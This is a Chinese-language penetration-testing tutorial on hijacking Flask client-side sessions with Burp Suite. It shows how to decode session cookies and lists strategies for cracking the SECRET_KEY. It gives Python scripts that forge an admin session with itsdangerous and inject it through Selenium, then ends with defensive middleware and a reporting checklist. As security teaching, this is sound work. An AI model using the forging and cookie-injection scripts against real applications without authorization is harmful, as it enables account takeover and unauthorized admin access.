用Burp Suite复现Flask会话劫持：一个渗透测试工程师的实操笔记

Flask会话劫持实战：Burp Suite与自动化脚本的高级渗透技巧

在Web应用安全领域，会话管理机制的安全性往往决定着整个系统的防御等级。Flask作为Python生态中最受欢迎的轻量级Web框架，其默认的客户端会话机制既带来了便利性，也引入了独特的安全挑战。本文将从一个专业渗透测试工程师的视角，深入剖析如何利用Burp Suite配合定制化工具链，实现对Flask应用的会话劫持攻击。

1. 环境侦察与目标识别

在开始实际攻击之前，精准识别目标应用的框架类型和会话机制是成功的关键。不同于传统的盲测方法，专业的安全测试需要建立系统化的识别流程。

Flask应用的特征指纹通常体现在以下几个方面：

• Cookie命名模式：默认使用session作为会话Cookie名称
• Cookie结构特征：采用数据.签名的点分格式，签名部分长度固定
• HTTP头部信息：可能包含Server: Werkzeug/xx.x.x等特征
• 错误页面样式：Flask特有的调试页面具有独特布局

使用Burp Suite的Target模块时，可以通过以下方法快速筛选Flask应用：

GET / HTTP/1.1 Host: target.com Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36

观察响应中的Set-Cookie头部：

HTTP/1.1 200 OK Set-Cookie: session=eyJ1c2VyIjoiZ3Vlc3QifQ.YlF7Vw.5p9z5Qz4z4Z5X5Z5X5Z5; Path=/; HttpOnly

关键识别指标对照表：

对于启用了HttpOnly标志的会话Cookie，传统的XSS攻击手段可能失效。此时需要结合以下技术进行深度检测：

1. 使用Burp的Repeater模块修改Cookie值，测试服务端验证逻辑
2. 通过Intruder模块对签名部分进行模糊测试
3. 检查应用是否泄露SECRET_KEY（如调试信息、JS源码注释等）

2. Burp Suite拦截与会话解码

现代Web应用的会话机制日趋复杂，但Flask的默认实现仍保持着相对简单的设计。专业的安全测试需要掌握从流量分析到数据解构的全套技能。

2.1 请求拦截与会话捕获

配置Burp Suite作为中间人代理时，需要注意以下高级设置：

1. 在Proxy > Options中启用Intercept responses based on...选项
2. 添加session到Session Handling Rules的关键词列表
3. 设置Match and Replace规则自动标记含会话的请求

典型的拦截流程示例：

1. 用户登录目标应用，生成合法会话
2. Burp拦截到包含Set-Cookie的响应：

HTTP/1.1 200 OK Set-Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.YlF7Vw.5p9z5Qz4z4Z5X5Z5X5Z5; Path=/; HttpOnly; Secure

3. 将完整Cookie值复制到解码工具进行分析

2.2 会话解码实战

使用改进版的flask-session-cookie-manager进行深度分析：

python3 flask_session_cookie_manager3.py decode -c "eyJ1c2VybmFtZSI6ImFkbWluIn0.YlF7Vw.5p9z5Qz4z4Z5X5Z5X5Z5" -s "weak_secret_123"

解码结果分析要点：

• 检查会话数据中是否包含敏感字段（如is_admin、user_role等）
• 验证时间戳有效性（Flask默认31天有效期）
• 测试不同SECRET_KEY的兼容性（开发/生产环境差异）

当面对未知SECRET_KEY时，可以尝试以下破解策略：

1. 字典攻击：使用常见Flask密钥列表（如GitHub泄露数据集）
2. 模式匹配：尝试日期、项目名等组合（如"flask_app_2023"）
3. 暴力破解：针对短密钥（<8字符）使用GPU加速破解

3. 高级会话伪造技术

获得有效的SECRET_KEY后，攻击者可以构造任意权限的会话凭证。这一阶段需要精细控制会话数据的每个细节，以规避可能的服务端验证。

3.1 精准构造恶意会话

使用Python脚本动态生成管理员会话：

from itsdangerous import URLSafeTimedSerializer import json secret_key = "stolen_secret_123" session_data = { "user_id": 1, "username": "superadmin", "roles": ["admin", "audit"], "login_time": "2023-07-20T14:30:00Z" } serializer = URLSafeTimedSerializer(secret_key) forged_cookie = serializer.dumps(session_data) print(f"伪造的管理员会话: {forged_cookie}")

关键参数优化技巧：

• 保持时间戳在合理范围内（避免未来时间）
• 复制原始会话的字段结构（防止异常检测）
• 添加冗余字段模拟真实环境（如session_id、csrf_token）

3.2 绕过HttpOnly限制的三种方法

虽然HttpOnly标志阻止了JavaScript直接访问Cookie，但仍存在突破方案：

1. 中间人替换：通过Burp等工具直接修改请求中的Cookie值
2. 浏览器扩展注入：开发定制扩展程序注入伪造会话
3. 协议级重定向：构造特殊URL触发服务端会话覆盖

自动化注入脚本示例（Python + Selenium）：

from selenium import webdriver from selenium.webdriver.chrome.options import Options chrome_options = Options() chrome_options.add_argument("--proxy-server=127.0.0.1:8080") driver = webdriver.Chrome(options=chrome_options) target_url = "https://vulnerable-app.com/admin" malicious_cookie = { 'name': 'session', 'value': 'eyJhZG1pbiI6dHJ1ZX0.YlF7Vw.5p9z5Qz4z4Z5X5Z5X5Z5', 'domain': 'vulnerable-app.com', 'path': '/', 'secure': True } driver.get("https://vulnerable-app.com/login") driver.add_cookie(malicious_cookie) driver.get(target_url) # 此时将以管理员身份访问后台

4. 企业级防御与攻击检测

理解攻击手段的目的是为了构建更完善的防御体系。针对Flask会话劫持，企业应当实施多层防护策略。

防御矩阵实施方案：

Python代码示例 - 会话加固中间件：

from flask import Flask, request, session import hashlib import os app = Flask(__name__) app.secret_key = os.urandom(32) # 使用加密安全的随机密钥 @app.before_request def validate_session(): client_fingerprint = request.headers.get('User-Agent', '') + request.remote_addr expected_hash = hashlib.sha256(client_fingerprint.encode()).hexdigest() if session.get('fp_hash') != expected_hash: session.clear() # 指纹不匹配时终止会话 return "Security alert: session validation failed", 403

在渗透测试报告中，应当特别关注以下风险指标：

1. SECRET_KEY的存储位置和访问权限
2. 会话超时时间的合理设置（建议≤4小时）
3. 敏感操作是否需要重新认证
4. 会话固定（Session Fixation）漏洞的存在性